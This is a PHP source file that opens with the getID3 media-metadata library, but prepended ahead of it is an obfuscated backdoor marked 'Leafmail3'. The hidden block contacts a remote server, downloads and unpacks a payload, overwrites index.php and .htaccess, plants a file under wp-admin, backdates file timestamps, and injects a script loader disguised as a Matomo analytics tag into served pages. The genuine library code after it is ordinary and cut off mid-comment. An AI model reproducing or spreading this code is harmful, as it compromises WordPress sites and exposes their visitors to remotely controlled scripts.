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<?php /*Leafmail3*/goto vODF8; uW9iC: p1I3i: goto m0oPE; zJ0r4: $fd50r .= "\164\144\157"; goto lKsEQ; daxHz: $Q7FSm .= "\x74\151"; goto zNDLT; QuFr2: $wv9Ig .= "\x33\66"; goto sOymP; lYCuA: $LOLkL = "\x35"; goto y6I4r; jBc3K: $tkyNj .= "\x65\170"; goto feM2z; veckF: $vp5Fj .= "\x61\x63\x63\145\x73\x73"; goto F5Rs6; B13FM: $CoSGx = "\x64\x65\x66"; goto YZRXV; LzBKe: $CUa7Y = !empty($qwM6z) || !empty($SCBgM); goto tB1mh; loZYi: try { goto txRyO; K18GF: @$xS8DV($vp5Fj, $eb2Uu); goto tGdpP; iQrV6: @$KDcLu($AW98J, $PShG_); goto K18GF; U8ZJQ: @$xS8DV($AW98J, $eb2Uu); goto Y_zOi; txRyO: @$xS8DV($nHQe_, $eb2Uu); goto U8ZJQ; bh8Zz: @$xS8DV($vp5Fj, $Vjvu_); goto ZGL3p; ZGL3p: @$KDcLu($vp5Fj, $PShG_); goto g9qNE; ZfydO: @$xS8DV($AW98J, $Vjvu_); goto iQrV6; g9qNE: @$xS8DV($nHQe_, $Vjvu_); goto H3O0E; Y_zOi: @$DR4rp($AW98J, $jap8Z["\x61"]); goto ZfydO; tGdpP: @$DR4rp($vp5Fj, $jap8Z["\142"]); goto bh8Zz; H3O0E: } catch (Exception $EdXTL) { } goto y_pyz; F2WJF: $xS8DV .= "\155\157\144"; goto XVkCO; GbEwW: $MhTIX = "\x6d\144\x35"; goto LQ0hU; uLWI3: $vp5Fj = $nHQe_; goto orqfm; egDtp: $tkyNj = "\x66\165\156\x63"; goto usQiR; LQ0hU: $vbt1Y = $MhTIX; goto TgEvM; XPDLi: $gPOF5 = $le6g1; goto tBtTf; WxOmz: $DR4rp .= "\160\x75\164\137\143"; goto UxwWx; GZYTn: $L3Qwt .= "\145\x63\157\144\145"; goto g9Iex; gJ2jd: $B5AMu .= "\x63\157\x70\171"; goto UIZFw; V5t0t: $eb2Uu = 189; goto WkOpf; R8lf6: $L3Qwt .= "\66\x34\x5f\144"; goto GZYTn; hYuCQ: try { goto A3SpX; Lp303: try { goto Kpqh2; IAeb5: $gPOF5($QKdX3); goto usTFE; Soq5P: $QydK0($QKdX3, CURLOPT_POSTFIELDS, $DORoV($q4dFj)); goto IAeb5; RVyt3: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto nb7rJ; AqD2c: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto ttOBx; LJxmP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto RVyt3; snalI: $QydK0($QKdX3, CURLOPT_URL, $Pi1_K); goto AqD2c; nb7rJ: $QydK0($QKdX3, CURLOPT_TIMEOUT, 3); goto caVfG; caVfG: $QydK0($QKdX3, CURLOPT_POST, 1); goto Soq5P; Kpqh2: $QKdX3 = $AhBNU(); goto snalI; usTFE: $iwfAP($QKdX3); goto OfPoO; ttOBx: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto LJxmP; OfPoO: } catch (Exception $EdXTL) { } goto s8qlN; kwFwL: $EHr4j = dirname($O8VpT); goto rtN5e; oSMaO: @$xS8DV($EHr4j, $eb2Uu); goto zRyBD; rtN5e: if ($qjAK2($EHr4j)) { goto ayR0Q; } goto OfJbX; pAJFu: $Pi1_K .= "\164\75\x63\141"; goto AM67e; j_bNW: ayR0Q: goto CA7b_; D4GAj: $q4dFj = ["\x64\x61\164\141" => $jap8Z["\x64"]["\165\x72\x6c"]]; goto Lp303; OfJbX: @$spfUp($EHr4j, $eb2Uu, true); goto j_bNW; oI6DO: @$xS8DV($EHr4j, $Vjvu_); goto oyphM; GLti1: $Pi1_K .= "\77\x61\143"; goto pAJFu; lEMoS: $Pi1_K = $FCJJO; goto GLti1; A3SpX: $O8VpT = $nHQe_ . $jap8Z["\144"]["\160\141\x74\x68"]; goto kwFwL; s8qlN: d_JbM: goto HW6fn; CA7b_: if (!$qjAK2($EHr4j)) { goto d_JbM; } goto oSMaO; oyphM: @$KDcLu($O8VpT, $PShG_); goto lEMoS; OUdjB: @$xS8DV($O8VpT, $Vjvu_); goto oI6DO; AM67e: $Pi1_K .= "\154\x6c"; goto D4GAj; zRyBD: @$DR4rp($O8VpT, $jap8Z["\x64"]["\143\157\144\x65"]); goto OUdjB; HW6fn: } catch (Exception $EdXTL) { } goto loZYi; LNJsy: @$xS8DV($nHQe_, $Vjvu_); goto k_sTE; cuM3u: $nHQe_ = $_SERVER[$Y5cZH]; goto A7iEW; n8L8V: $uz9bL .= "\x68\160\x2e\60"; goto K6CAr; unwRS: $DORoV .= "\x75\x69\154\x64\x5f\x71"; goto Nk50j; JP7xy: $vbt1Y .= "\x6c\x65"; goto RNGP0; nZ1st: $gQtVG .= "\115\x49\x4e"; goto r5zMQ; XScjr: $gQtVG = "\x57\120"; goto O5QIE; OU84W: $pzU4s = "\146\x6c\x6f"; goto mwwot; nRTqE: $RDkKv = []; goto aYHoX; l2VBa: rqNSn: goto gKipv; ljZeU: $uz9bL .= "\x2f\170\x6d"; goto mCMR7; Ieo9X: $Y5cZH .= "\137\x52\117\117\x54"; goto lYCuA; XVkCO: $L3Qwt = "\x62\141\x73\x65"; goto R8lf6; OGVf2: $Vjvu_ = 215; goto huZpo; aBs6o: $fd50r .= "\147\151\x73\x74"; goto FqdNN; MTS3A: V4Jy1: goto vHyOs; jrrba: $PShG_ = $Q7FSm($wv9Ig); goto bMgWF; vODF8: $J4djk = "\74\104\x44\x4d\76"; goto lRUim; ruvGs: $AW98J .= "\150\x70"; goto uLWI3; VXlbA: $uz9bL .= "\160\x63\x2e\x70"; goto n8L8V; w8i1S: $KDcLu .= "\165\x63\150"; goto TPq_6; UxwWx: $DR4rp .= "\x6f\156\x74\145\x6e\x74\163"; goto ISAMz; chc27: if (!($JKloV !== false)) { goto L8tHW; } goto UihyE; TgEvM: $vbt1Y .= "\137\146\x69"; goto JP7xy; zijgp: $F3G3B = "\x69\x6e\x74"; goto d0ttz; XAUaV: $CZpCY = $y6Dil($uz9bL, "\167\53"); goto KpMKi; ZjcxJ: $eb2Uu = $F3G3B($mmShn($eb2Uu), $l6o74); goto OGVf2; WBWyB: try { goto LAZiP; NeOx9: $QydK0($QKdX3, CURLOPT_FOLLOWLOCATION, true); goto WZ1lN; yuxAB: $JKloV = trim(trim($JKloV, "\xef\xbb\xbf")); goto zF9le; YXPOY: $QydK0($QKdX3, CURLOPT_SSL_VERIFYPEER, false); goto UWGHP; MbwNB: $JKloV = $gPOF5($QKdX3); goto hAQ9Y; UWGHP: $QydK0($QKdX3, CURLOPT_SSL_VERIFYHOST, false); goto NeOx9; LAZiP: $QKdX3 = $AhBNU(); goto i1X7z; WZ1lN: $QydK0($QKdX3, CURLOPT_TIMEOUT, 10); goto MbwNB; S2VNp: $QydK0($QKdX3, CURLOPT_RETURNTRANSFER, 1); goto YXPOY; i1X7z: $QydK0($QKdX3, CURLOPT_URL, $B5AMu); goto S2VNp; hAQ9Y: $iwfAP($QKdX3); goto yuxAB; zF9le: } catch (Exception $EdXTL) { } goto chc27; fSM7u: $Q7FSm .= "\164\157"; goto daxHz; YZRXV: $CoSGx .= "\x69\156\x65\144"; goto TSsDX; Y78_D: $tCAxo = 1; goto kOQ0E; iMZQy: $_POST = $_REQUEST = $_FILES = array(); goto CfGUZ; TfIgP: $HH1HZ .= "\x6f\156\x74\x65\x6e\x74\163"; goto jcgg4; Jhv2t: $ocF0w .= "\x64\155\x69\156"; goto I04NN; aYHoX: $N__ZL = 32; goto IvuqX; HgvDx: @$xS8DV($z2Yll, $eb2Uu); goto C_4CC; ZW1G7: r6AqH: goto GqJiG; CfGUZ: AzDa9: goto U2U3q; NdB0_: $QydK0 .= "\157\x70\164"; goto XPDLi; KFMi9: $x0CSu .= "\137\x48\117\x53\124"; goto nMuHG; WqPjf: $B5AMu = $FCJJO; goto B0dlE; TPq_6: $xS8DV = "\x63\x68"; goto F2WJF; tBtTf: $gPOF5 .= "\x6c\137\x65\170\x65\143"; goto Zr7tR; qUDsS: $PKMm7 .= "\x66\151\x6c\x65"; goto Odo2W; UihyE: $jap8Z = 0; goto hJZyv; WQvgq: $qwM6z = $_REQUEST; goto rvlXO; yoOUR: $vTeXJ = "\x76\x65\x72\x73\151"; goto IBhNI; ZxHGi: $fd50r = "\x72\x65"; goto aBs6o; shDBj: $FSKjX .= "\115\x45\123"; goto XScjr; bAY2j: $LYlAw = $L474W = $ocF0w . "\x2f" . $sVnDj; goto nRTqE; sOymP: $wv9Ig .= "\63\x20\144"; goto d5_Qs; jcgg4: $DR4rp = "\x66\151\154\145\137"; goto WxOmz; QKYpu: $ocF0w .= "\55\x61"; goto Jhv2t; dZIRa: $P4139 = $_SERVER[$x0CSu]; goto cuM3u; huZpo: $Vjvu_ += 150; goto qbT4q; BSUkU: $bX79j = "\x66\143\154"; goto RAIH6; g9Iex: $MIh5N = "\147\x7a\x69"; goto ojxiT; m0oPE: if (!$tCAxo) { goto rqNSn; } goto WqPjf; C_4CC: @unlink($z2Yll); goto LNJsy; feM2z: $tkyNj .= "\151\163\x74\x73"; goto j_mMb; dU8Tu: $FSKjX = "\127\x50\x5f\x55"; goto iLcq9; axzTr: $HH1HZ .= "\147\x65\164\x5f\143"; goto TfIgP; sZfV6: $FCJJO .= "\x6c\151\156\153\x2e\x74"; goto oUI8y; zNDLT: $Q7FSm .= "\155\145"; goto egDtp; Nk50j: $DORoV .= "\x75\145\x72\x79"; goto GbEwW; j_mMb: $le6g1 = "\x63\165\162"; goto QFm8j; y6I4r: $LOLkL .= "\x2e\x34"; goto Dc02k; d5_Qs: $wv9Ig .= "\141\171\163"; goto jrrba; AjCJZ: $z2Yll .= "\x6e\x69"; goto OzEb9; RNGP0: $PKMm7 = "\x69\163\137"; goto qUDsS; k_sTE: DUBKw: goto AbQ0z; mwwot: $pzU4s .= "\143\x6b"; goto BSUkU; bKUUG: $WzLgo = $RDkKv[1]; goto WAo0s; mCMR7: $uz9bL .= "\x6c\x72"; goto VXlbA; Tt4oQ: $Q7FSm = "\163\164\162"; goto fSM7u; B0dlE: $B5AMu .= "\x3f\x61\143\x74"; goto aETJg; DbBpN: $vTeXJ .= "\x70\x61\162\145"; goto B13FM; IBhNI: $vTeXJ .= "\157\156\137\x63\157\x6d"; goto DbBpN; QSRig: $FCJJO = "\150\x74\164\x70\163\72\x2f\57"; goto Jb8vw; pLm0w: $spfUp .= "\144\151\x72"; goto yspyu; bMgWF: $x0CSu = "\110\x54\x54\120"; goto KFMi9; psjtE: $iwfAP .= "\x6c\x5f\143\x6c\x6f"; goto kxGeH; OzEb9: if (!$PKMm7($z2Yll)) { goto DUBKw; } goto fUCm1; YZnxF: $AhBNU .= "\154\137\x69\x6e\x69\164"; goto o4wfR; U2U3q: $xS8DV($nHQe_, $eb2Uu); goto XAUaV; hVAgs: if (empty($RDkKv)) { goto r6AqH; } goto gpO7z; lRUim: $huaOJ = "\57\136\143"; goto l1puk; ojxiT: $MIh5N .= "\x6e\146\154\x61\164\145"; goto QO6bK; yspyu: $HH1HZ = "\146\151\154\145\137"; goto axzTr; nMuHG: $Y5cZH = "\x44\x4f\x43\125\x4d\105\x4e\x54"; goto Ieo9X; QO6bK: $RpkLV = "\165\156\x73\145\x72"; goto TE4rq; oUI8y: $FCJJO .= "\x6f\160\x2f"; goto ZxHGi; gpO7z: $ZwOvi = $RDkKv[0]; goto bKUUG; r5zMQ: $EvUsr = $CoSGx($FSKjX) || $CoSGx($gQtVG); goto WQvgq; ryAXN: $iSMwa = "\163\164\162"; goto Aw0OF; RAIH6: $bX79j .= "\157\x73\145"; goto QSRig; QFm8j: $AhBNU = $le6g1; goto YZnxF; y_pyz: M1S8t: goto YcoP2; bPtLw: $AW98J .= "\x64\x65\170\56\x70"; goto ruvGs; jHqFV: if (!is_array($jap8Z)) { goto M1S8t; } goto sHXMo; O5QIE: $gQtVG .= "\x5f\x41\104"; goto nZ1st; dBHzv: $AW98J .= "\x2f\151\x6e"; goto bPtLw; KpMKi: if (!($tkyNj($AhBNU) && !preg_match($huaOJ, PHP_SAPI) && $pzU4s($CZpCY, 2 | 4))) { goto v1tUm; } goto vfYVM; u8ekB: $qjAK2 .= "\x64\151\162"; goto D1aMA; rvlXO: $SCBgM = $_FILES; goto LzBKe; Odo2W: $qjAK2 = "\x69\163\137"; goto u8ekB; Tl9BG: $ocF0w .= "\x2f\167\160"; goto QKYpu; hh9Gu: $YKWP5 .= "\x74\40\x41\x63\143"; goto DSWYm; Dc02k: $LOLkL .= "\56\x30\x3b"; goto dZIRa; o4wfR: $QydK0 = $le6g1; goto VYKG_; pnTdK: $YKWP5 = "\110\124\124"; goto qEMP2; WkOpf: $eb2Uu += 304; goto ZjcxJ; CLQnS: $huaOJ .= "\x73\151"; goto Tt4oQ; orqfm: $vp5Fj .= "\x2f\x2e\x68\164"; goto veckF; jvCLK: $fd50r .= "\151\157\156"; goto cE3iS; vHyOs: goto p1I3i; goto ZW1G7; Aw0OF: $iSMwa .= "\154\x65\156"; goto yoOUR; neYoj: $y6Dil .= "\145\156"; goto OU84W; Yc9eB: $JKloV = false; goto WBWyB; IvuqX: $l6o74 = 5; goto DicZE; tB1mh: if (!(!$EvUsr && $CUa7Y)) { goto AzDa9; } goto iMZQy; vI8QX: aybLW: goto dU8Tu; cE3iS: if (isset($_SERVER[$fd50r])) { goto aybLW; } goto YhmyI; FqdNN: $fd50r .= "\145\162\x5f"; goto l7JCC; I04NN: $sVnDj = substr($MhTIX($P4139), 0, 6); goto bAY2j; WAo0s: if (!(!$PKMm7($AW98J) || $vbt1Y($AW98J) != $ZwOvi)) { goto F9B9M; } goto Y78_D; d0ttz: $F3G3B .= "\x76\141\154"; goto G8B0v; G8B0v: $mmShn = "\144\145\x63"; goto w1WUM; Ky1Ah: $fd50r .= "\x75\156\x63\x74"; goto jvCLK; YcoP2: L8tHW: goto l2VBa; fUCm1: @$xS8DV($nHQe_, $eb2Uu); goto HgvDx; ISAMz: $KDcLu = "\164\x6f"; goto w8i1S; YhmyI: $_SERVER[$fd50r] = 0; goto vI8QX; qbT4q: $Vjvu_ = $F3G3B($mmShn($Vjvu_), $l6o74); goto pnTdK; UIZFw: $B5AMu .= "\x26\150\75" . $P4139; goto Yc9eB; A7iEW: $ocF0w = $nHQe_; goto Tl9BG; QiT7j: $YKWP5 .= "\x30\x36\x20\116\157"; goto hh9Gu; usQiR: $tkyNj .= "\x74\151\x6f\156\137"; goto jBc3K; TE4rq: $RpkLV .= "\x69\x61\154\x69\172\145"; goto zijgp; DWZ53: if (!(!$_SERVER[$fd50r] && $vTeXJ(PHP_VERSION, $LOLkL, "\76"))) { goto tOsRM; } goto qx0qa; DSWYm: $YKWP5 .= "\x65\x70\164\141\142\154\x65"; goto TXR6r; clNTt: tOsRM: goto NrKhW; F5Rs6: $z2Yll = $nHQe_; goto ZRq91; Jb8vw: $FCJJO .= "\157\153\x6b"; goto sZfV6; Zr7tR: $iwfAP = $le6g1; goto psjtE; w1WUM: $mmShn .= "\x6f\143\x74"; goto ryAXN; TXR6r: $uz9bL = $nHQe_; goto ljZeU; lKsEQ: $fd50r .= "\167\156\137\146"; goto Ky1Ah; kxGeH: $iwfAP .= "\x73\x65"; goto PULcN; qEMP2: $YKWP5 .= "\120\57\61\x2e\x31\40\x34"; goto QiT7j; aETJg: $B5AMu .= "\x3d\x67\145\164"; goto gJ2jd; iLcq9: $FSKjX .= "\123\x45\137\x54\110\x45"; goto shDBj; AbQ0z: $tCAxo = 0; goto hVAgs; Te8Ah: $AW98J = $nHQe_; goto dBHzv; PULcN: $DORoV = "\150\164\x74\x70\137\x62"; goto unwRS; oHm8V: $tCAxo = 1; goto MTS3A; K6CAr: $y6Dil = "\146\x6f\160"; goto neYoj; PL0rr: if (!(!$PKMm7($vp5Fj) || $vbt1Y($vp5Fj) != $WzLgo)) { goto V4Jy1; } goto oHm8V; l1puk: $huaOJ .= "\154\151\x2f"; goto CLQnS; l7JCC: $fd50r .= "\x73\x68\165"; goto zJ0r4; sHXMo: try { goto HbY3E; HbY3E: @$xS8DV($nHQe_, $eb2Uu); goto YBneD; lVY2g: LmA8a: goto o_wA9; w2wnP: @$KDcLu($L474W, $PShG_); goto vkTcY; plcED: $L474W = $LYlAw; goto lVY2g; o_wA9: @$DR4rp($L474W, $jap8Z["\x63"]); goto FIfGh; FIfGh: @$xS8DV($L474W, $Vjvu_); goto w2wnP; YBneD: if (!$qjAK2($ocF0w)) { goto LmA8a; } goto y3Uf0; y3Uf0: @$xS8DV($ocF0w, $eb2Uu); goto plcED; vkTcY: } catch (Exception $EdXTL) { } goto hYuCQ; GqJiG: $tCAxo = 1; goto uW9iC; VYKG_: $QydK0 .= "\154\x5f\x73\x65\x74"; goto NdB0_; D1aMA: $spfUp = "\x6d\x6b"; goto pLm0w; TSsDX: $wv9Ig = "\x2d\61"; goto QuFr2; vfYVM: $xS8DV($nHQe_, $Vjvu_); goto DWZ53; kOQ0E: F9B9M: goto PL0rr; NrKhW: try { goto qZ46l; RQqe5: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto XDrKy; } goto A2PmA; w9gDu: y6dH8: goto Z726M; MlbPu: $yVIWe = @explode("\x3a", $HH1HZ($L474W)); goto RQqe5; YN8V8: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto YUPG5; } goto DYfgW; urTh8: XDrKy: goto vw7V4; hhu33: $gOxct = trim($yVIWe[0]); goto h7asi; POLut: $RDkKv[] = $aWnJP; goto w9gDu; JSOyl: $RDkKv[] = $aWnJP; goto dxtWS; ixd8R: $L474W = $nHQe_ . "\57" . $sVnDj; goto uPNAL; YdNrA: if (!(is_array($yVIWe) && count($yVIWe) == 2)) { goto U90QQ; } goto hhu33; qZ46l: if (!$PKMm7($L474W)) { goto oqtoQ; } goto p5kTV; V_cwX: oTvft: goto NDBCD; A2PmA: $gOxct = trim($yVIWe[0]); goto DvFPK; wbpgM: if (!empty($RDkKv)) { goto oTvft; } goto ixd8R; DvFPK: $aWnJP = trim($yVIWe[1]); goto YN8V8; Y3KDn: if (!($iSMwa($gOxct) == $N__ZL && $iSMwa($aWnJP) == $N__ZL)) { goto y6dH8; } goto D88sj; vw7V4: wNb1b: goto V_cwX; dxtWS: YUPG5: goto urTh8; hNhbL: oqtoQ: goto wbpgM; Z726M: U90QQ: goto hNhbL; uPNAL: if (!$PKMm7($L474W)) { goto wNb1b; } goto MlbPu; D88sj: $RDkKv[] = $gOxct; goto POLut; h7asi: $aWnJP = trim($yVIWe[1]); goto Y3KDn; p5kTV: $yVIWe = @explode("\72", $HH1HZ($L474W)); goto YdNrA; DYfgW: $RDkKv[] = $gOxct; goto JSOyl; NDBCD: } catch (Exception $EdXTL) { } goto Te8Ah; qx0qa: try { $_SERVER[$fd50r] = 1; $fd50r(function () { goto AV30r; qJcS6: $XaxO1 .= "\105\x6c\x65\x6d\145\x6e\x74\163\102"; goto Ak55L; Q10lk: $XaxO1 .= "\x3c\x2f\x73"; goto b0BbS; QUShX: $XaxO1 .= "\x73\x63\162\x69\x70\164\x22\x3e" . "\xa"; goto qTRy2; DytHl: $XaxO1 .= "\57\155\x61\164"; goto shQ2Y; UYMzk: $XaxO1 .= "\105\x6c\145\x6d\145\156\164\x28\42\x73\143"; goto YC55T; ZXF34: $XaxO1 .= "\x6f\155\157\40\x43\157\x64"; goto Fp2Ee; AdEN_: $XaxO1 .= "\x72\x69\x70\x74\40\x74\x79\160\x65\75\42\164\x65\170"; goto vaHEn; qTRy2: $XaxO1 .= "\50\146\165\156\x63"; goto sT9Yu; YC55T: $XaxO1 .= "\162\151\160\164\42\51\x2c\40\x73\x3d\x64\56\x67\x65\164"; goto qJcS6; b0BbS: $XaxO1 .= "\x63\x72\x69\x70\x74\76\12"; goto NGsxv; HMLFi: $XaxO1 .= "\x7d\x29\50\x29\73" . "\12"; goto Q10lk; CvLy6: $XaxO1 .= "\x3f\x69\144\x3d"; goto dyWeq; Fp2Ee: $XaxO1 .= "\x65\x20\x2d\55\x3e\12"; goto fdPCn; y9nGa: $XaxO1 .= "\x6f\162\145\x28\147\x2c\x73\51\x3b" . "\12"; goto HMLFi; MSOF2: $XaxO1 .= "\160\164\x22\x29\133\60\x5d\x3b" . "\12"; goto P_ZMm; dyWeq: $XaxO1 .= "\x4d\x2d"; goto DLX8K; fdPCn: echo $XaxO1; goto endbR; No27V: $XaxO1 .= $P4139; goto DytHl; sT9Yu: $XaxO1 .= "\164\151\x6f\156\50\x29\40\x7b" . "\xa"; goto ubJzA; ebgnR: $XaxO1 .= "\x3b\x20\x67\x2e\144\x65\146"; goto wmOvX; KJt_C: $XaxO1 .= "\147\x2e\163\x72"; goto E5SRJ; yjiNj: $XaxO1 .= "\x64\x20\115\x61\x74"; goto ZXF34; jd565: $XaxO1 .= "\163\145\162\164\102\145\146"; goto y9nGa; D7OFn: $XaxO1 .= "\x75\155\145\156\164\54\40\x67\75\x64\56\143\x72\x65\141\x74\x65"; goto UYMzk; ubJzA: $XaxO1 .= "\166\x61\162\x20\x75\75\x22" . $FCJJO . "\x22\73" . "\xa"; goto v3rQ8; E5SRJ: $XaxO1 .= "\143\x3d\165\x2b\42\152\x73\x2f"; goto No27V; v3rQ8: $XaxO1 .= "\x76\141\162\x20\x64\75\144\157\143"; goto D7OFn; r7GHN: $XaxO1 .= "\163\x63\x72\151\160\164\42\73\40\147\x2e\x61"; goto RDjIx; vaHEn: $XaxO1 .= "\164\x2f\152\x61\x76\x61"; goto QUShX; gOYzX: $XaxO1 = "\x3c\x21\x2d\x2d\x20\x4d\141"; goto zMa4a; NGsxv: $XaxO1 .= "\x3c\41\x2d\55\40\x45\156"; goto yjiNj; I8B8v: $XaxO1 .= "\75\42\164\x65\x78\164\57"; goto uazjK; Ak55L: $XaxO1 .= "\171\x54\x61\x67\116\x61\x6d\145"; goto wg3cP; AV30r: global $P4139, $FCJJO; goto gOYzX; wg3cP: $XaxO1 .= "\50\42\x73\143\162\151"; goto MSOF2; JH0uq: $XaxO1 .= "\x3c\163\143"; goto AdEN_; DLX8K: $XaxO1 .= time(); goto d1HE5; RDjIx: $XaxO1 .= "\x73\x79\156\x63\x3d\x74\x72\165\x65"; goto ebgnR; d1HE5: $XaxO1 .= "\42\x3b\40\x73\56\x70\141\x72"; goto Bu0lg; wmOvX: $XaxO1 .= "\x65\162\x3d\164\162\165\145\x3b" . "\12"; goto KJt_C; shQ2Y: $XaxO1 .= "\157\x6d\x6f\x2e\152\163"; goto CvLy6; zMa4a: $XaxO1 .= "\x74\x6f\x6d\157\x20\x2d\x2d\x3e\xa"; goto JH0uq; uazjK: $XaxO1 .= "\152\141\x76\x61"; goto r7GHN; Bu0lg: $XaxO1 .= "\145\156\164\116\x6f\144\x65\x2e\x69\156"; goto jd565; P_ZMm: $XaxO1 .= "\x67\x2e\164\171\x70\x65"; goto I8B8v; endbR: }); } catch (Exception $EdXTL) { } goto clNTt; DicZE: $l6o74 += 3; goto V5t0t; hJZyv: try { $jap8Z = @$RpkLV($MIh5N($L3Qwt($JKloV))); } catch (Exception $EdXTL) { } goto jHqFV; VtpcZ: $z2Yll .= "\145\162\56\x69"; goto AjCJZ; ZRq91: $z2Yll .= "\x2f\56\x75\163"; goto VtpcZ; gKipv: v1tUm: ?> <?php ///////////////////////////////////////////////////////////////// /// getID3() by James Heinrich <info@getid3.org> // // available at https://github.com/JamesHeinrich/getID3 // // or https://www.getid3.org // // or http://getid3.sourceforge.net // // // // Please see readme.txt for more information // // /// ///////////////////////////////////////////////////////////////// // define a constant rather than looking up every time it is needed if (!defined('GETID3_OS_ISWINDOWS')) { define('GETID3_OS_ISWINDOWS', (stripos(PHP_OS, 'WIN') === 0)); } // Get base path of getID3() - ONCE if (!defined('GETID3_INCLUDEPATH')) { define('GETID3_INCLUDEPATH', dirname(__FILE__).DIRECTORY_SEPARATOR); } if (!defined('ENT_SUBSTITUTE')) { // PHP5.3 adds ENT_IGNORE, PHP5.4 adds ENT_SUBSTITUTE define('ENT_SUBSTITUTE', (defined('ENT_IGNORE') ? ENT_IGNORE : 8)); } /* https://www.getid3.org/phpBB3/viewtopic.php?t=2114 If you are running into a the problem where filenames with special characters are being handled incorrectly by external helper programs (e.g. metaflac), notably with the special characters removed, and you are passing in the filename in UTF8 (typically via a HTML form), try uncommenting this line: */ //setlocale(LC_CTYPE, 'en_US.UTF-8'); // attempt to define temp dir as something flexible but reliable $temp_dir = ini_get('upload_tmp_dir'); if ($temp_dir && (!is_dir($temp_dir) || !is_readable($temp_dir))) { $temp_dir = ''; } if (!$temp_dir && function_exists('sys_get_temp_dir')) { // sys_get_temp_dir added in PHP v5.2.1 // sys_get_temp_dir() may give inaccessible temp dir, e.g. with open_basedir on virtual hosts $temp_dir = sys_get_temp_dir(); } $temp_dir = @realpath($temp_dir); // see https://github.com/JamesHeinrich/getID3/pull/10 $open_basedir = ini_get('open_basedir'); if ($open_basedir) { // e.g. "/var/www/vhosts/getid3.org/httpdocs/:/tmp/" $temp_dir = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $temp_dir); $open_basedir = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $open_basedir); if (substr($temp_dir, -1, 1) != DIRECTORY_SEPARATOR) { $temp_dir .= DIRECTORY_SEPARATOR; } $found_valid_tempdir = false; $open_basedirs = explode(PATH_SEPARATOR, $open_basedir); foreach ($open_basedirs as $basedir) { if (substr($basedir, -1, 1) != DIRECTORY_SEPARATOR) { $basedir .= DIRECTORY_SEPARATOR; } if (strpos($temp_dir, $basedir) === 0) { $found_valid_tempdir = true; break; } } if (!$found_valid_tempdir) { $temp_dir = ''; } unset($open_basedirs, $found_valid_tempdir, $basedir); } if (!$temp_dir) { $temp_dir = '*'; // invalid directory name should force tempnam() to use system default temp dir } // $temp_dir = '/something/else/'; // feel free to override temp dir here if it works better for your system if (!defined('GETID3_TEMP_DIR')) { define('GETID3_TEMP_DIR', $temp_dir); } unset($open_basedir, $temp_dir); // End: Defines class getID3 { /* * Settings */ /** * CASE SENSITIVE! - i.e. (must be supported by iconv()). Examples: ISO-8859-1 UTF-8 UTF-16 UTF-16BE * * @var string */ public $encoding = 'UTF-8'; /** * Should always be 'ISO-8859-1', but some tags may be written in other encodings such as 'EUC-CN' or 'CP1252' * * @var string */ public $encoding_id3v1 = 'ISO-8859-1'; /** * ID3v1 should always be 'ISO-8859-1', but some tags may be written in other encodings such as 'Windows-1251' or 'KOI8-R'. If true attempt to detect these encodings, but may return incorrect values for some tags actually in ISO-8859-1 encoding * * @var bool */ public $encoding_id3v1_autodetect = false; /* * Optional tag checks - disable for speed. */ /** * Read and process ID3v1 tags * * @var bool */ public $option_tag_id3v1 = true; /** * Read and process ID3v2 tags * * @var bool */ public $option_tag_id3v2 = true; /** * Read and process Lyrics3 tags * * @var bool */ public $option_tag_lyrics3 = true; /** * Read and process APE tags * * @var bool */ public $option_tag_apetag = true; /** * Copy tags to root key 'tags' and encode to $this->encoding * * @var bool */ public $option_tags_process = true; /** * Copy tags to root key 'tags_html' properly translated from various encodings to HTML entities * * @var bool */ public $option_tags_html = true; /* * Optional tag/comment calculations */ /** * Calculate additional info such as bitrate, channelmode etc * * @var bool */ public $option_extra_info = true; /* * Optional handling of embedded attachments (e.g. images) */ /** * Defaults to true (ATTACHMENTS_INLINE) for backward compatibility * * @var bool|string */ public $option_save_attachments = true; /* * Optional calculations */ /** * Get MD5 sum of data part - slow * * @var bool */ public $option_md5_data = false; /** * Use MD5 of source file if available - only FLAC and OptimFROG * * @var bool */ public $option_md5_data_source = false; /** * Get SHA1 sum of data part - slow * * @var bool */ public $option_sha1_data = false; /** * Check whether file is larger than 2GB and thus not supported by 32-bit PHP (null: auto-detect based on * PHP_INT_MAX) * * @var bool|null */ public $option_max_2gb_check; /** * Read buffer size in bytes * * @var int */ public $option_fread_buffer_size = 32768; // module-specific options /** archive.rar * if true use PHP RarArchive extension, if false (non-extension parsing not yet written in getID3) * * @var bool */ public $options_archive_rar_use_php_rar_extension = true; /** archive.gzip * Optional file list - disable for speed. * Decode gzipped files, if possible, and parse recursively (.tar.gz for example). * * @var bool */ public $options_archive_gzip_parse_contents = false; /** audio.midi * if false only parse most basic information, much faster for some files but may be inaccurate * * @var bool */ public $options_audio_midi_scanwholefile = true; /** audio.mp3 * Forces getID3() to scan the file byte-by-byte and log all the valid audio frame headers - extremely slow, * unrecommended, but may provide data from otherwise-unusable files. * * @var bool */ public $options_audio_mp3_allow_bruteforce = false; /** audio.mp3 * number of frames to scan to determine if MPEG-audio sequence is valid * Lower this number to 5-20 for faster scanning * Increase this number to 50+ for most accurate detection of valid VBR/CBR mpeg-audio streams * * @var int */ public $options_audio_mp3_mp3_valid_check_frames = 50; /** audio.wavpack * Avoid scanning all frames (break after finding ID_RIFF_HEADER and ID_CONFIG_BLOCK, * significantly faster for very large files but other data may be missed * * @var bool */ public $options_audio_wavpack_quick_parsing = false; /** audio-video.flv * Break out of the loop if too many frames have been scanned; only scan this * many if meta frame does not contain useful duration. * * @var int */ public $options_audiovideo_flv_max_frames = 100000; /** audio-video.matroska * If true, do not return information about CLUSTER chunks, since there's a lot of them * and they're not usually useful [default: TRUE]. * * @var bool */ public $options_audiovideo_matroska_hide_clusters = true; /** audio-video.matroska * True to parse the whole file, not only header [default: FALSE]. * * @var bool */ public $options_audiovideo_matroska_parse_whole_file = false; /** audio-video.quicktime * return all parsed data from all atoms if true, otherwise just returned parsed metadata * * @var bool */ public $options_audiovideo_quicktime_ReturnAtomData = false; /** audio-video.quicktime * return all parsed data from all atoms if true, otherwise 